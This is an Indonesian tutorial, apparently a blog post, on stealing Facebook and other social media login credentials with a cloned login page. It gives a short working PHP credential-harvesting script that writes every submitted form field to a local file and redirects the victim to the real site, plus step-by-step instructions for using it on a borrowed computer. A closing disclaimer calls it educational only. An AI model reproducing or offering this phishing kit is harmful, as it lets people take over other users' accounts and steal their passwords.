Mengambil alih sebuah situs atau lebih tepatnya cara hack sebuah situs dengan cara mendapatkan password. mungkin terdengar seram. namun Salah satu cara untuk mendapatkan informasi password atau email dalam sebuah akun dapat kita lakukan dengan cara Phishing atau membuat dan menyerupai suatu tempat login (Authentication) dari sebuah laman situs. Kamu pernah login dihalaman situs. Ya, kamu pasti lebih banyak sering login dimedia sosial seperti Facebook, Instagram, Twitter, email dari Gmail dan lain sebagainya. untuk masuk dalam sebuah akun, kita juga tidak jarang sering meminjam laptop atau komputer teman untuk login diakun pribadi kita.
Tapi tahukah kamu, ketika kamu meminjam laptop atau komputer teman dan menggunakannya untuk login ke akun pribadi kamu. mungkin, semua aktivitas kamu akan bisa terdeksi oleh temanmu. dengan catatan temanmu mengerti seputar aktifitas phishing, cracking dan hacking password. untuk mendapatkan password dan email akun pribadi seseorang memang cukup mudah dilakukan. Lalu bagaimana mendapatkan password dan email akun seseorang ? Mungkin, kita bisa memanfaatkan kelemahan manusia untuk mencuri dan mengetahui password dan email akun pribadinya. dengan cara apa ?
Kita bisa menganalisis bahwa manusia itu mempunyai sifat yang ceroboh yang cenderung terburu-buru. tanpa memperdulikan sekelilingnya dan memperhatikan apa yang sedang dia kerjakan. nah disinilah kelamahan manusia yang sering dimanfaatkan Hacker pencuri password untuk mendapatkan Password dan informasi terkait seperti username dan email akun pribadinya.
Tutorial kali ini kita akan mempraktekan seputar cara mendapatkan dan mengetahui password dan informasi terkait seperti username dan email akun pribadi seseorang hanya menggunakan notepad dengan memanfaatkan kelemahan manusia. untuk medianya kita cukup memerlukan sebuah notepad yang sudah disediakan dikomputer atau laptop kalian. kesimpulan dari cara kerjanya adalah kita akan meniru tempat atau fortal login sebuah akun situs sama persis. kamu bisa menggunakan media sosial seperti Facebook, Instagram, Twitter dan lain sebagainya yang mempunyai form tempat untuk login atau masuk (euthentication), terserah, semua nya bisa.
Jadi cara kerja penetrasi ini adalah kita akan meniru dan membuat sama persis tempat login itu sendiri. jika target kalian sudah melakukan login dengan menggunakan form login tiruan tersebut di komputer anda, maka target akan dibawa kesitus aslinya dan melakukan login untuk kedua kalinya. disini password, username atau emailnya sudah kita dapatkan yang tersimpan dalam salah satu file. dan catatan aktivitas ini hanyak akan berhasil di laptop atau komputer.
Cara Mendapatkan email dan Password Akun seseorang hanya menggunakan Notepad
1. Buat sati folder terlebih dahulu
2. Masuk ke login focebook. untuk tutorial ini medianya facebook.
3. Setelah form login facebook terbuka. download script loginnya tersebut dengan cara klik kanan > save as > pilih komplet website. dan simpan difolder yang dibuat tadi.
4. buka notepad sobat. dan copy script dibawah ini
<?php5. Simpan dengan nama Hack.php lalu save di folder yang dibuat tadi.
header ('Location:https://twitter.com//');
$handle = fopen("usernames.txt", "a");
foreach($_POST as $variable => $value) {
fwrite($handle, $variable);
fwrite($handle, "=");
fwrite($handle, $value);
fwrite($handle, "\r\n");
}
fwrite($handle, "\r\n");
fclose($handle);
exit;
?>
6. buka file index menggunakan notepad. tekan ctrl+f, cari Login_form atau Action. lalu ganti link utama situs tersebut dengan hack.php kemudian save. seperti gambar dibawah.
7. Kemudian Klik kanan file index, lalu pilih open with > pilih Chrome
7. Maka tempat login tiruan facebook pun sudah terbuat. hal ini dibuktikan dengan memperhatikan link nya yang bukan facebook.com
8. Terakhir coba anda ujicoba dengan login memasukan email dan password menggunakan form tiruan tersebut. lalu tekan masuk
9. Setelah anda menekan login. anda akan dibawa menuju situs yang asli. Nah disinilah anda sudah mendapatkan password dan email yang ditampung disebuah file yang secara otomatis terbuat. bernama username.
10. untuk mencari file username tersebut. anda cukup membuka folder awal yang sebelumnya kita buat.
Jadi kesimpulannya. penetrasi untuk mengetahui dan mendapatkan inforamasi mengenai password, useram dan email sangat mudah untuk dilakukan. ketika kamu melakukan login di form tiruan tersebut dengan memasukan password dan emailnya. maka password tersebut akan masuk ke file username yang ada difolder yang dibuat tadi .:) ini tidak hanya facebook loh. tapi seluruh media yang melakukan aktifitas login. dan bila ada kendala dari tutorial tersebut. anda bisa langsung ke email saya. ejakmail@gmail.com. terimakasih
PERINGATAN : Ini hanya media pembelajaran, pengetahuan dan wawasan dan dilarang keras untuk melakukannya dengan niat yang tidak baik yang merugikan orang lain. karena jelas dilarang dalam diundang-undang di negara indonesia.